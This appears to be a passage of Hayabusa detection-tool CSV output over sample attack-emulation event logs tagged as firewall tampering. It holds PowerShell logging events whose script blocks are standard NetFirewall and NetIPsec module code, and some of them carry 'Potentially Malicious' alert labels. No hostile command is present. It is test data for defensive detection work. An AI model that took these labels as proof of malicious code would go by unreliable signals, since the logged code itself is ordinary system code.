Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.144 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.145 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.177 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.177 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.178 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.178 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.178 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.179 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.183 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.185 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.185 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.186 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.226 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.226 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.227 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.228 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh 